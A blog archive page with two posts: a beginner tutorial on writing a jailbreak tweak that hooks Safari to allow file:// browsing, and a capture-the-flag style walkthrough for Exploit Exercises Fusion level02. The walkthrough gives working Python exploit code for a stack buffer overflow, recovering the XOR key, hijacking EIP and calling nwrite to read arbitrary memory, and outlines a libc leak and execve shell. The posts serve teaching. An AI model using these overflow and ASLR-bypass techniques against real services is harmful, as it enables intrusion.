Light Bulb: 2016

Sunday, September 4, 2016

A First Look at Tweak Development: Enabling File URL Support for Safari

I've always been interested in getting into tweak development, but I've been busy doing other things, and I've also not had a jailbroken iPhone (sigh). A few days ago, I got my golden chance. It was a request on the r/jailbreak subreddit, asking for a tweak to enable browsing the filesystem using the Safari browser through the file:// protocol/scheme. I imagined it was a simple tweak to develop, which would be suitable for a first-time tweak.

The Problem

Normally, the Safari app on iOS doesn't allow viewing files in the filesystem. If you try to browse a local file, using a URL like file:///path/to/my/file, you are greeted with a message:

Safari cannot open the page because it is a local file.

The error message displayed in iOS 9.3.3

Our mission is to grab the MobileSafari binary from our iDevice, and then find out where in the app this alert is triggered.

Prerequisites

We really need to talk about the prerequisites to following this tutorial. First of all, it is a no brainer that you need to know Objective-C. It follows that you also need to know a little bit of C. I'm not saying you should be able to write a compiler in C — you only need to understand the basics, and preferably be able to write a simple class in Objective-C.

Now, for this tutorial, you won't need to know ARM assembly — I know I don't (albeit I do have experience with x86 assembly). ARM assembly is a must if you wish to become a good mobile reverser, however. Also, you will need a disassembler. I'll be using a trial version of Hopper (https://hopperapp.com), but feel free to use what you have. Hex Rays (https://hex-rays.com) also offers IDA as a demo version which is known to work with 32 bit binaries (it doesn't work with 64 bit binaries).

Next, you need to have Theos set up in your development environment. I won't go into the details of setting up Theos, but I might do so in another post.

Lastly, you need to have a jailbroken iOS device, which I suppose you already do.

Examining the Binary

Now that we are ready, let's first retrieve the binary for Safari. In order to do that, connect to your iOS device with your favorite SCP client, and retrieve the following file:

/Applications/MobileSafari.app/MobileSafari

Now let's load the binary in our disassembler. The first thing to do after loading the binary is to search for the error string that Safari shows when we try to browse the filesystem. Hopper has a very nice user interface: its left pane lets us quickly search for a string within the binary.

Search results

We search for the string "local file", and the first result in the list is actually the string we are looking for. So we go ahead and double click it — this takes us to the location of the string in the disassembly.

Now that we found the string, we need to find the part of the code which accesses the string. Hopper is once again very useful: we click on the address (0x1001698ac), and then press the 'x' key. This shows us the list of the parts of the code which have references to the string we found.

List of references to our string

As we can see, there is only one reference to the string we found. We select the only result, and then click on the Go button. This will take us, in the disassembly, to the part of code which accesses our string.

Code that references our string

I know you might be puzzled about what this is. First of all, notice that there is a bunch of similar things, prefixed by the dq pseudo-instruction, which stands for declare-quad (word). We can see that between each line there is a difference of 0x10, or 16 bytes. So each line, or entry, is made of 16 bytes, or 4 words. Each word represents a thing. We are dealing with some sort of internal representation of strings. Each entry is made of the type, which for the string is ___CFConstantStringClassReference, a word which should be a bunch of flags for internal purposes which seems to be the same: 0x7c8 (I'm not sure about it, nor do we care), another word which is the actual address of the string literal (does 0x1001698ac ring a bell?), and finally another word which seems to be the length of our string. Indeed, 0x37 is 55 in decimal, which just happens to be the length of the error string.
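A quick sanity check of the length claim, as a minimal Python 3 sketch. It only assumes that the message is stored exactly as Safari displays it; the variable names are made up for illustration.

```python
# The error string exactly as Safari displays it.
message = "Safari cannot open the page because it is a local file."

# The last field of the entry, as read from the disassembly.
length_field = 0x37

# If our reading of the entry is right, the two numbers agree.
print(len(message), length_field)
```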

Let's click on the address once again (0x1001911b0, it's highlighted in the screenshot above), and press 'x' once again.

Code that uses our string finally shows up

We get this nice popup once again, and this time we found our target. We can see that it is a method in the TabDocument class which starts with _decidePolicyForAction. Let's click on the Go button, and find out its full name.

This time we will land on real code in the disassembly. What we need to do is scroll up until we see that "Beginning of Procedure" thing that Hopper nicely shows for us.

The method we should place our hook on

There it is, in all its glory, the method which shows us that nasty popup when we try to browse our filesystem from Safari. This means we should hook onto this method, in order to defeat Safari and make it obey us. So our target method is _decidePolicyForAction:request:inMainFrame:forNewWindow:currentURLIsFileURL:decisionHandler: of the TabDocument class.

But what should we do, specifically?

A Little Bit of Theo(s)ry

Before we can start working on anything, we should create the project for our tweak. Open up your terminal, and type $THEOS/bin/nic.pl. Theos will prompt you for the basic configuration needed:

Eltons-iMac:arm Elton$ $THEOS/bin/nic.pl
NIC 2.0 - New Instance Creator
------------------------------
[1.] iphone/activator_event
[2.] iphone/application_modern
[3.] iphone/cydget
[4.] iphone/flipswitch_switch
[5.] iphone/framework
[6.] iphone/ios7_notification_center_widget
[7.] iphone/library
[8.] iphone/notification_center_widget
[9.] iphone/preference_bundle_modern
[10.] iphone/tool
[11.] iphone/tweak
[12.] iphone/xpc_service
Choose a Template (required): 11

So initially Theos asks you for the template. Here we enter 11, because we want to write a tweak.

Project Name (required): fileProto

It also asks you for the project name, which you can feel free to change :)

Package Name [com.yourcompany.fileProto]: com.youcanchangeit.fileproto

Next is the package name, which you can choose to change (recommended).

Author/Maintainer Name [Default Name]: Your Name

Next it asks you for the author's name.

[iphone/tweak] MobileSubstrate Bundle filter [com.apple.springboard]: com.apple.mobilesafari

This is the bundle filter for the process we are going to hook onto. We enter com.apple.mobilesafari, which is the bundle filter for the MobileSafari process.

[iphone/tweak] List of applications to terminate upon installation (space-separated, '-' for none) [SpringBoard]: MobileSafari

Here is the list of applications which should be terminated upon our tweak's installation, so that the tweak is loaded. We enter MobileSafari, because we want Safari to restart so that our tweak gets loaded.

Instantiating iphone/tweak in fileProto/...
Done.

And, this is it. The tweak project is set up in the fileProto directory (or whatever the project name you chose was).

The project directory structure is rather simple: there is control, which is just a text file containing meta-data about our tweak, Makefile, which is used by Theos in the build process, projectName.plist (in my case fileProto.plist), and also the Tweak.xm file. We will only play with the Tweak.xm file, where the source code of our tweak will reside. This file also contains some comments which help you when you're writing your first tweak.

I know you can't wait to get your hands dirty, so let's learn just enough Logos for our purposes. Logos is the set of directives which we use in our tweak code to enable them to hook on methods we choose, and it looks pretty nice, too.

The directives start with a % symbol, followed by the directive name. We are going to use only four directives: %hook, %orig and %log...%end. I placed %end intentionally where it belongs, in the end. Let's now see how these directives are used.

The %hook directive is used to hook onto a specific class. So we create what is called a hook block, and we place all the methods we want to hook onto, inside this block.

%hook ClassName
    -(void) methodName {
        // yay! we hooked on a method
    }
%end

The hook block is closed with the %end directive. Inside the block we place the method we are going to replace (the method must exist, obviously). There are ways to add new methods, but this is out of the scope of this post. The %hook directive will automatically include the ClassName.h header. So where do we get this header? Well, we could use a tool named class-dump, or search the web if some nice guy has already uploaded the headers somewhere (There's also class-dump-z, but I used class-dump as I'm on a Hackintosh). Using class-dump is really easy, all you have to do is type the command:

Eltons-iMac:arm Elton$ ./class-dump MobileSafari > MobileSafari.h

This will dump the headers of our MobileSafari binary into MobileSafari.h. Now we have some housecleaning to do. Open MobileSafari.h, and find the string @interface TabDocument. Now delete everything above this string. Now find the string @end. Delete everything below this string. Now we are left with the header of the TabDocument class only. But, we can take it further.

Replace the long string in the beginning @interface TabDocument : NSObject <AppBannerMetaTagContentObserver... (until the first curly bracket {), with simply @interface TabDocument. Now delete everything between the curly braces. Next, delete everything between @interface TabDocument and @end, except for the definition of our method, which should look like this:

- (void)_decidePolicyForAction:(id)arg1 request:(id)arg2 inMainFrame:(_Bool)arg3 forNewWindow:(_Bool)arg4 currentURLIsFileURL:(_Bool)arg5 decisionHandler:(CDUnknownBlockType)arg6;

Lastly, replace CDUnknownBlockType with id. Now save the header. The header file should now look like this:

@interface TabDocument

- (void)_decidePolicyForAction:(id)arg1 request:(id)arg2 inMainFrame:(_Bool)arg3 forNewWindow:(_Bool)arg4 currentURLIsFileURL:(_Bool)arg5 decisionHandler:(id)arg6;

@end

Now feel free to rename MobileSafari.h into TabDocument.h, this way the header can be included automatically.
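If you'd rather not do the housecleaning by hand, the same trimming can be scripted. The following is only a rough Python 3 sketch: trim_header() and the SAMPLE text are made up for illustration, and real class-dump output may need extra care (categories, protocols, and so on).

```python
import re

def trim_header(header_text, class_name, selector_prefix):
    """Keep only the methods of class_name whose declaration contains selector_prefix."""
    # Grab the first "@interface ClassName ... @end" block.
    pattern = r"@interface\s+{}\b.*?@end".format(re.escape(class_name))
    block = re.search(pattern, header_text, re.S)
    if block is None:
        raise ValueError("class not found: " + class_name)
    methods = []
    for line in block.group(0).splitlines():
        line = line.strip()
        # Method declarations start with "- (" or "+ (".
        if line.startswith(("- (", "+ (")) and selector_prefix in line:
            # Block types that class-dump could not resolve become plain id.
            methods.append(line.replace("CDUnknownBlockType", "id"))
    return "@interface {}\n\n{}\n\n@end\n".format(class_name, "\n".join(methods))

# Tiny made-up stand-in for the class-dump output.
SAMPLE = """@interface Foo : NSObject
- (void)bar;
@end

@interface TabDocument : NSObject <SomeProtocol>
{
    id _someIvar;
}
- (void)_decidePolicyForAction:(id)arg1 request:(id)arg2 inMainFrame:(_Bool)arg3 forNewWindow:(_Bool)arg4 currentURLIsFileURL:(_Bool)arg5 decisionHandler:(CDUnknownBlockType)arg6;
- (void)somethingElse;
@end
"""

result = trim_header(SAMPLE, "TabDocument", "_decidePolicyForAction:")
print(result)
```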

Now we are going to use %log and %orig. %log is used to log all the parameters, whereas %orig is used to call the original version of the function we are hooked onto. Right now we are going to hook onto the method we found earlier, log all the arguments and then call the original function.

So let's load our Tweak.xm file and write this code:

%hook TabDocument
    - (void)_decidePolicyForAction:(id)arg1 request:(id)arg2 inMainFrame:(_Bool)arg3 forNewWindow:(_Bool)arg4 currentURLIsFileURL:(_Bool)arg5 decisionHandler:(id)arg6 {
        %log;  // this is enough to log all our arguments :)
        %orig; // and this is all that's needed to call the original function with the original arguments
    }
%end

We can see how easy Logos makes it to log the arguments and call the original function with the supplied arguments. Now let's build our tweak and install it, by opening the terminal, changing the working directory to the directory of our project, and then running:

make package install

This will compile our tweak, build the deb package inside the packages folder, and then install it into our device. Next, we should open up Safari, browse to a URL like file:///test and then inspect syslog for the logged arguments. Here is a good article which explains how to read syslog on your iDevice.

You should be able to find something like the following in your syslog:

Sep 4 23:09:20 Eltons-iPhone MobileSafari[6377] <Notice>: [fileProto] Tweak.xm:4 DEBUG: ...

Something of interest in the log message is the request argument: there we can see that this is actually of type NSMutableURLRequest. Also, it is important to notice that currentURLIsFileURL has a value of 0, so it probably doesn't do what it looks like it does. My first thought was actually to set this argument to NO, but it was NO already, i.e. 0.

Writing the Tweak

We concluded the previous section with a brief note about two seemingly important arguments, where one argument was actually useless.

Now, we could attempt to rewrite the whole method we hooked onto, but that would be too difficult: I promised we won't need ARM disassembling skills. Well, there is an easier way.

By using our critical thinking skills, we can conclude that, since currentURLIsFileURL is useless, the only argument that has information about the URL being visited is the request argument. So, if we mess with that argument, and temporarily set the URL to a fake URL, perhaps we could get away with it and have a working tweak. Sounds like a plan.

%hook TabDocument
    - (void)_decidePolicyForAction:(id)arg1 request:(id)arg2 inMainFrame:(_Bool)arg3 forNewWindow:(_Bool)arg4 currentURLIsFileURL:(_Bool)arg5 decisionHandler:(id)arg6 {
        NSURL *originalUrl = [arg2 URL];
        
        BOOL urlStartsWithFile = [[originalUrl absoluteString] hasPrefix:@"file://"];
        
        // only make the change if the URL starts with file://
        if (urlStartsWithFile) {
            // set a fake URL
            [arg2 setURL:[NSURL URLWithString:@"http://www.google.com"]];
        }
        
        %orig; // let the original function think we're visiting google :D
 
        if (urlStartsWithFile) {
             [arg2 setURL:originalUrl]; // restore the original URL if it was changed
        }
    }
%end

So we first save the original URL, and then we check if it starts with the file:// prefix. If so, we change the URL temporarily to google.com, so that the original function doesn't know we're actually trying to view a local file. Next we call the original function, and finally we restore the original URL if it was changed.
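The swap, call, restore pattern is not specific to Logos. Here is the same idea as a small Python 3 model; FakeRequest and original_decide_policy() are made-up stand-ins for NSMutableURLRequest and Safari's original method, not real APIs.

```python
class FakeRequest:
    """Made-up stand-in for NSMutableURLRequest."""
    def __init__(self, url):
        self.url = url

def original_decide_policy(request):
    """Made-up stand-in for the original method: it refuses file URLs."""
    return "blocked" if request.url.startswith("file://") else "allowed"

def hooked_decide_policy(request):
    original_url = request.url
    is_file_url = original_url.startswith("file://")
    if is_file_url:
        # Show the original code a harmless URL instead.
        request.url = "http://www.google.com"
    try:
        return original_decide_policy(request)
    finally:
        if is_file_url:
            # Put the real URL back, so that the page that loads is the file.
            request.url = original_url

request = FakeRequest("file:///var/tmp/pwn.txt")
decision = hooked_decide_policy(request)
print(decision, request.url)
```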

Let's build the tweak and install it with:

make package install

Now, let's create a file in our device, by ssh-ing into our device and typing:

echo "hi" > /var/tmp/pwn.txt

The final test is approaching. Open up Safari, and browse to the following URL:

file:///var/tmp/pwn.txt

You should be greeted with something like below:

Congratulations!

This means our small tweak has done its job. You deserve to pat yourself on the back.

Final Words

We took a first look at tweak development with Theos. We saw how we can take a binary from our device and reverse it to find out more. We generated the headers, took a quick look at Logos, gathered information about the arguments of our target method, devised a simple strategy, and finally we developed our tweak.

You can find the source code of the fileProto project on GitHub. Note: the source code may be a little bit different from what we've presented here, but the idea remains the same.

Wednesday, August 17, 2016

Exploit Exercises Fusion Level 02 Writeup

In this first post, we're going to exploit level 02 of Fusion from exploit-exercises.com. We will see how we can leverage a buffer overflow vulnerability to find our way into the much desired shell. If you haven't already, download the Fusion live CD ISO image, and boot it with VirtualBox or any other virtualization software you have.

First of all, let's see the source code of the challenge, and point out a few important things.


#include "../common/common.c"    

#define XORSZ 32

void cipher(unsigned char *blah, size_t len)
{
  static int keyed;
  static unsigned int keybuf[XORSZ];

  int blocks;
  unsigned int *blahi, j;

  if(keyed == 0) {
      int fd;
      fd = open("/dev/urandom", O_RDONLY);
      if(read(fd, &keybuf, sizeof(keybuf)) != sizeof(keybuf)) exit(EXIT_FAILURE);
      close(fd);
      keyed = 1;
  }

  blahi = (unsigned int *)(blah);
  blocks = (len / 4);
  if(len & 3) blocks += 1;

  for(j = 0; j < blocks; j++) {
      blahi[j] ^= keybuf[j % XORSZ];
  }
}

void encrypt_file()
{
  // http://thedailywtf.com/Articles/Extensible-XML.aspx
  // maybe make bigger for inevitable xml-in-xml-in-xml ?
  unsigned char buffer[32 * 4096];

  unsigned char op;
  size_t sz;
  int loop;

  printf("[-- Enterprise configuration file encryption service --]\n");
  
  loop = 1;
  while(loop) {
      nread(0, &op, sizeof(op));
      switch(op) {
          case 'E':
              nread(0, &sz, sizeof(sz));
              nread(0, buffer, sz);
              cipher(buffer, sz);
              printf("[-- encryption complete. please mention "
              "474bd3ad-c65b-47ab-b041-602047ab8792 to support "
              "staff to retrieve your file --]\n");
              nwrite(1, &sz, sizeof(sz));
              nwrite(1, buffer, sz);
              break;
          case 'Q':
              loop = 0;
              break;
          default:
              exit(EXIT_FAILURE);
      }
  }
      
}

int main(int argc, char **argv, char **envp)
{
  int fd;
  char *p;

  background_process(NAME, UID, GID); 
  fd = serve_forever(PORT);
  set_io(fd);

  encrypt_file();
}

A Short Walkthrough

Let's start by looking at main(). It looks to be serving on a specific port, and upon receiving a connection, it calls encrypt_file(). The binary for this level (as with all other levels) is located at /opt/fusion/bin/level02. Normally all levels follow a pattern: level01 listens on port 20001, level02 listens on port 20002, but for the tutorial's sake, let's see what port it is listening on:

fusion@fusion:~$ sudo lsof -i | grep level02
...
level02 1471 20002 3u IPv4 12112 0t0 TCP *:20002 (LISTEN)

As we can see, it is indeed listening on port 20002. Let's now take a look at encrypt_file(). It is the landing function when connected to the host. Basically, the function runs a loop which first reads a single char, which can be either 'E' or 'Q'. 'Q' makes the function return, while 'E' is used to encrypt our data with the key the server has generated.

If we choose to encrypt data, the server requires that we send an integer which is equal to the length of the plaintext, followed by the plaintext itself. nread() is used to read data from us, with the first parameter being 0, which stands for STDIN, the second parameter being the place where to store the value being read, and the third parameter being the size of the data to read. After the data is encrypted, the server will write back to us, in a similar fashion, the size of the encrypted data, followed by the data itself. nwrite() is used to write data back to us, with the only difference being that the first parameter is now 1, which stands for STDOUT. Then the loop restarts.

The only function we haven't yet seen is cipher(). The cipher() function may seem a little daunting at first, but all it really does is XOR-encrypt our data with a randomly generated key. Moreover, the key doesn't change for the lifetime of the connection. The key is of type unsigned int[32], i.e. 128 bytes, and the data is XORed with it one 4-byte word at a time, so the key repeats every 128 bytes.
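To make cipher() less daunting, here is a rough Python 3 model of it. This is a sketch, not the server's code: it assumes little-endian 32-bit words (the target is i686), and the key is passed in as a parameter instead of being kept in a static variable.

```python
import os
import struct

XORSZ = 32  # number of 32-bit words in the key, as in the C source

def cipher(buf, length, keybuf):
    """XOR a bytearray in place, one 32-bit word at a time.

    Like the C code, the word count is rounded up, so up to 3 bytes past
    `length` are also touched when `length` is not a multiple of 4.
    """
    blocks = length // 4
    if length & 3:
        blocks += 1
    for j in range(blocks):
        (word,) = struct.unpack_from("<I", buf, j * 4)
        struct.pack_into("<I", buf, j * 4, word ^ keybuf[j % XORSZ])

# A random 128-byte key, viewed as 32 unsigned ints.
keybuf = struct.unpack("<32I", os.urandom(XORSZ * 4))

once = bytearray(b"A" * 256)
cipher(once, len(once), keybuf)

twice = bytearray(once)
cipher(twice, len(twice), keybuf)
```

Running it on 256 identical bytes shows two things: the second half of the ciphertext repeats the first half (the key wraps around after 128 bytes), and encrypting twice gives back the original data.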

Time to talk about the fun part: the vulnerability. But, by now, you must've spotted the vulnerability. If not, please do not continue reading until you find out where the vulnerability is.

So, as you have already noticed (you did follow my advice, didn't you?) the vulnerability is that buffer has a size of 131072 bytes, but all nread() cares about is the size of the data we send to it, thus allowing us to overflow the buffer as we please.
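The numbers behind that claim, as a tiny Python 3 check. It assumes that size_t is 4 bytes wide, which should hold on this 32-bit target.

```python
# Size of the stack buffer declared in encrypt_file().
BUFFER_SIZE = 32 * 4096

# Largest length we can claim in the 4-byte size field (assumes a 32-bit size_t).
SIZE_FIELD_MAX = 2**32 - 1

print(BUFFER_SIZE, hex(BUFFER_SIZE))
print(SIZE_FIELD_MAX > BUFFER_SIZE)
```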

Getting Control of EIP

We have reviewed the source code of the vulnerable program, and we also showed why the program was vulnerable. Now we are going to exploit this vulnerability, by first doing the simplest thing you can do to a vulnerable program: crash it. To do this, we are going to overwrite the return address of the encrypt_file() function with an invalid address. However, we have just a minor obstacle in front of us.

Sure enough, sending a sufficiently large plaintext to encrypt will crash the server. However, we want to be able to alter the server's state in a meaningful way, so we need to take the encryption into account.

Let's just lay a little bit of foundation for the exploit we will be writing.

import socket
from struct import pack, unpack
import telnetlib

def connect(host='localhost', port=20002):
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect((host,port))
    return s


def consume_welcome_message(fd):
    welcome_message = "[-- Enterprise configuration file encryption service --]\n"
    
    # return the message if needed for debugging purposes
    return fd.read(len(welcome_message))

def send_quit(fd):
    fd.write('Q')

def encrypt_data(fd, data):
    """this function sends data for encryption to the server. returns the encrypted data"""
    fd.write('E' + pack('<I', len(data)) + data) 
    success_message = "[-- encryption complete. please mention 474bd3ad-c65b-47ab-b041-602047ab8792 to support staff to retrieve your file --]\n"
    fd.read(len(success_message)) # ignore the encryption complete message
    encrypted_data_len, = unpack('<I', fd.read(4))
    return fd.read(encrypted_data_len)

def main():
    sock = connect()
    sock_fd = sock.makefile('rw', bufsize=0) # file descriptor for socket
    
    consume_welcome_message(sock_fd)
    
    encrypted_test = encrypt_data(sock_fd, 'test data to encrypt')

if __name__ == '__main__':
    main()

We wrote a set of functions which will help us to develop the exploit later on. The file descriptor is used instead of the socket in order to avoid calling recv() repeatedly when trying to read fixed length data.
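The scripts in this post are Python 2. If you are following along in Python 3, the same "read exactly n bytes" idea can be sketched with a plain recv() loop. recv_exact() is a made-up helper name, and the socket pair below only stands in for the real connection.

```python
import socket

def recv_exact(sock, count):
    """Keep calling recv() until exactly `count` bytes have arrived."""
    chunks = []
    remaining = count
    while remaining > 0:
        chunk = sock.recv(remaining)
        if not chunk:
            raise EOFError("connection closed with %d bytes still expected" % remaining)
        chunks.append(chunk)
        remaining -= len(chunk)
    return b"".join(chunks)

# Local demonstration: a connected socket pair plays client and server.
server_side, client_side = socket.socketpair()
server_side.sendall(b"[-- ")
server_side.sendall(b"Enterprise")

prefix = recv_exact(client_side, 4)
word = recv_exact(client_side, 10)

server_side.close()
client_side.close()
```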

Retrieving the Encryption Key

I know it is beginning to look like a really long journey, but believe me, we will soon get to the fun part. Now let's dive a little bit deeper into what happens when we send the data to encrypt to the server. Right after the server receives the data, a call to cipher() follows. By carefully inspecting cipher(), we can deduce that the function encrypts the buffer in place, then the same buffer is sent back to us. Also, remember that as long as we keep the same connection to the server, the encryption key will remain the same.

XOR encryption is very simple, and the way it works makes it really easy to retrieve the key if we have both the plaintext and the ciphertext. Since we already have the plaintext, and we also get the ciphertext back when encrypting the data, we can easily retrieve the key. Let's now write the methods necessary to perform xor encryption and to retrieve the key.


def xor(value, key):
    # isn't python a joy?
    return ''.join([chr(ord(e) ^ ord(key[i % len(key)])) for i, e in enumerate(value)])

def retrieve_key(fd):
    dummy_data = 'A' * 128
    return xor(dummy_data, encrypt_data(fd, dummy_data))

There we have it. We wrote our xor encryption routine, and also a method to retrieve the encryption key.
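We can convince ourselves that the trick works without touching the server. In this Python 3 sketch, server_key is a made-up stand-in for the server's secret key, and xor() is a bytes version of the routine above.

```python
import os

def xor(value, key):
    """XOR every byte of value with the key, repeating the key as needed."""
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(value))

server_key = os.urandom(128)          # made-up stand-in for the server's key
dummy_data = b"A" * 128               # the plaintext we choose to send

ciphertext = xor(dummy_data, server_key)    # what the server would send back
recovered_key = xor(dummy_data, ciphertext) # plaintext xor ciphertext

print(recovered_key == server_key)
```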

Back to Owning EIP

Alright, we now can retrieve the encryption key with which the server is encrypting the data we send. As I previously mentioned, xor has a very nice property:

If A xor B = C, then A xor C = B, and also B xor C = A.

So if we encrypt the encrypted data, we get back the original plaintext. Get it? If we encrypt the data before sending it, the cipher() function will actually decrypt the data, effectively leaving our original data in memory.
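Here is that idea in a small Python 3 sketch. The key and the payload are made up for illustration; the point is only that the bytes which end up in the server's memory are the ones we started with.

```python
def xor(value, key):
    """XOR every byte of value with the key, repeating the key as needed."""
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(value))

key = bytes(range(128))                       # made-up key, same size as the real one
payload = b"A" * 200 + b"\xef\xbe\xad\xde"    # what we want to land in memory

on_the_wire = xor(payload, key)    # we "encrypt" before sending
in_memory = xor(on_the_wire, key)  # the server's cipher() undoes it

print(in_memory == payload)
```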

So now we are free to own the EIP as we wish. We know that the buffer's size is 131072 bytes. So we need to add a few more bytes in order to enjoy our first victory.

Let's write a method to do just that.


def crash_server(fd, key, bufsize=131072):
    junk = 'A' * bufsize # this will fill the buffer completely
    overwrite = 'AAAABBBBCCCCDDDDEEEEFFFF'
    data = xor(junk + overwrite, key)
    encrypt_data(fd, data)
    send_quit(fd)

# let's change our main method
def main():
    sock = connect()
    sock_fd = sock.makefile('rw', bufsize=0) # file descriptor for socket
    
    consume_welcome_message(sock_fd)
    
    key = retrieve_key(sock_fd)
    crash_server(sock_fd, key)

So we wrote the crash_server() method, which takes the socket file descriptor and the encryption key, and sends a payload which should crash the server by setting EIP to a bogus address. We first send the data by calling the encrypt_data() method, then we send 'Q' to make the encrypt_file() function in the server return to our overwritten address. Let's see if 24 bytes are enough to overwrite the return address.

So, we run the script, and...well, nothing. We need to check the logs:

fusion@fusion:~$ dmesg | tail
[...]

[104449.594025] level02[11212]: segfault at 45454545 ip 45454545 sp bfd93020 error 14

Oh boy...it looks like the server crashed at EIP 0x45454545. If your ASCII is a little bit rusty, you can verify that 0x45 (or 69 decimal) belongs to the character E. So we can deduce that 16 bytes beyond the buffer, we start overwriting the return address.
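Instead of counting letters by hand, we can let Python find the offset. A small Python 3 sketch, using the overwrite pattern and the crash address from above:

```python
from struct import pack

overwrite = b"AAAABBBBCCCCDDDDEEEEFFFF"   # the pattern we sent after the buffer
crash_eip = 0x45454545                    # the address reported by dmesg

# Position of the crashing value inside the pattern = distance from the
# end of the buffer to the saved return address.
offset = overwrite.index(pack("<I", crash_eip))
print(offset)
```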

An Arbitrary Read Primitive

So far we have taken control of EIP, meaning we can make execution flow to an address we wish. But we have two protections to defeat: NX & ASLR. They work very well in conjunction, but the moment we beat ASLR, NX becomes pretty weak. We now get to the harder (and more fun) part of exploitation. In order to beat ASLR, we either have to bruteforce it (yuck!), or find a way to leak a memory address which will then be used to find out other addresses of interest. The latter is what we are going to do now.

In order to leak information from memory, we need a way to get that data to us. I hear what you are saying...the answer is nwrite(). This function reads from a specific address, and writes that data to us via the socket connection. But, what to read? Before we move on to read from an actually useful address, we are going to read the string "Enterprise" from the server, to make sure that things are working.

In order to setup the exploit, we first need a few things. Let's load the level02 binary in gdb and find the address of nwrite() and the address of the "Enterprise" string.

fusion@fusion:~$ gdb /opt/fusion/bin/level02
GNU gdb (Ubuntu/Linaro 7.3-0ubuntu2) 7.3-2011.08
Copyright (C) 2011 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law. Type "show copying"
and "show warranty" for details.
This GDB was configured as "i686-linux-gnu".
For bug reporting instructions, please see:
<http://bugs.launchpad.net/gdb-linaro/>...
Reading symbols from /opt/fusion/bin/level02...done.
(gdb) p &nwrite

$1 = (ssize_t (*)(int, void *, size_t)) 0x80495a0 <nwrite>

So we can see that nwrite() resides in address 0x80495a0. Now we need to find the address of the string "Enterprise". We know that the function encrypt_file() prints the welcome message when first called. So let's disassemble that function and see what we can find.

(gdb) disas encrypt_file
Dump of assembler code for function encrypt_file:
0x080497f7 <+0>: push %ebp
0x080497f8 <+1>: mov %esp,%ebp
0x080497fa <+3>: sub $0x20028,%esp
0x08049800 <+9>: movl $0x8049e04,(%esp)
0x08049807 <+16>: call 0x8048930 <puts@plt>

Just at the top of the function, we can see a call to puts(). The source code shows that the code actually calls printf(), but maybe the compiler has optimized it to use puts() since it contains just a simple string and no formatting. So we have no choice but to see what is the value in the only parameter that is passed to puts(), that is 0x8049e04.

(gdb) p (char*) 0x8049e04

$3 = 0x8049e04 "[-- Enterprise configuration file encryption service --]"

And sure enough, there is our warm welcoming message. So our welcoming message is at address 0x8049e04, but we want to get only the string "Enterprise", not the whole string. So the address we need is 0x8049e04 + 4, to skip the first 4 characters, which gives us 0x8049e08.
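The same arithmetic in Python 3, in case you want to double check the address and the size. The variable names are made up; the values come from the gdb session above.

```python
welcome = "[-- Enterprise configuration file encryption service --]"
welcome_addr = 0x8049e04                 # address of the whole message

skip = welcome.index("Enterprise")       # characters in front of the word
enterprise_addr = welcome_addr + skip
enterprise_len = len("Enterprise")

print(hex(enterprise_addr), enterprise_len)
```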

So we know the address of the function we are going to call, we know the address of the data we are going to read (and its size), now we are missing only one piece of the puzzle: How? To answer that question, we need to take a look at how the stack is laid out when we crash the server with the proof-of-concept code we wrote above where we overwrote the return address with 0x45454545.

As we found out previously, there was a gap of 16 bytes between the buffer and the saved return address. So the stack looked something like below: (hint: you can verify by attaching gdb to the running process)

----------------------
| return address |
----------------------
| saved ebp address |
----------------------
| unknown (4 bytes) |
----------------------
| unknown (4 bytes) |
----------------------
| unknown (4 bytes) |
----------------------
| buffer (131072 bytes)|
----------------------

Then, after sending the data to encrypt (which overflowed), the stack became like below:

----------------------
| 0x45454545 | <-- EEEE
----------------------
| 0x44444444 | <-- DDDD
----------------------
| 0x43434343 | <-- CCCC
----------------------
| 0x42424242 | <-- BBBB
----------------------
| 0x41414141 | <-- AAAA
----------------------
| buffer (131072 bytes)| <-- filled with A's
----------------------

So far so good. We know that we need to replace the return address with the address of nwrite(). How about its parameters? Well, it makes sense to discuss a little bit how a function is called in ASM by using nwrite() as an example. Normally we would push the arguments first, starting from the rightmost argument to the first, and then call the function. Here's how it would be in code:


push $10        ; push the length of the string (3rd argument)
push $0x8049e08 ; push the address of the string Enterprise (2nd argument)
push $1         ; push STDOUT (1st argument)
call 0x80495a0  ; call nwrite

Moreover the call instruction could also be written as:


push return_address ; address nwrite will return to, when done
jmp 0x80495a0       ; jump to nwrite to execute the function

So, in order to execute the nwrite() function, we need to write 4 values after overwriting the return address, in the reverse order in which they are pushed to the stack in the code snippet above. Armed with this information, let's change our Python script so that it tries to read the string we want.


def test_arbitrary_read(fd, key, param_addr, param_size):
    junk_len = 131072 + 16
    nwrite_address = 0x80495a0
    nwrite_return = 0xdeadbeef
    param_stdout = 1
    payload = junk_len * 'A'
    payload += pack('<I', nwrite_address)
    payload += pack('<I', nwrite_return)
    payload += pack('<I', param_stdout)
    payload += pack('<I', param_addr)
    payload += pack('<I', param_size)
    payload = xor(payload, key)
    encrypt_data(fd, payload)
    send_quit(fd) # trigger the exploit
    print fd.read(param_size) # prints Enterprise when reading 10 bytes from 0x8049e08

# let's change main
def main():
    sock = connect()
    sock_fd = sock.makefile('rw', bufsize=0) # file descriptor for socket
    
    consume_welcome_message(sock_fd)
    
    key = retrieve_key(sock_fd)
    test_arbitrary_read(sock_fd, key, 0x8049e08, 10) # read 10 bytes from 0x8049e08 and print them

Alright, we have our code all set up. We do the usual connect() call, followed by the method that consumes the welcome message, next we retrieve the key, and we finally call our arbitrary read method. Since we have decided that nwrite() will return to 0xdeadbeef, it means that we should also check the logs to see if the server will crash at that address or not. Now let's run it.

fusion@fusion:~$ ./exploit.py
Enterprise

Nice! It seems we were able to read that sought after "Enterprise" string. Let's also inspect the logs to see if there is any crash:

fusion@fusion:~$ dmesg | tail
[...]
[173049.114112] level02[16997]: segfault at deadbeef ip deadbeef sp bfd93024 error 15

As expected, we have our controlled demolition right there, at 0xdeadbeef, as promised.

In GOT We Trust

We now have an arbitrary read primitive, which we can use to leak an address. This is such a great victory. The next step relies on that ability to read arbitrary memory of the victim process. Our plan is as follows:

1. Leak the address of a function from libc and use this address to compute the ASLR offset.
2. Use the address above to deduce the address of execve(), and the address of the string "/bin/sh".
3. Construct the shell payload.
4. Profit!

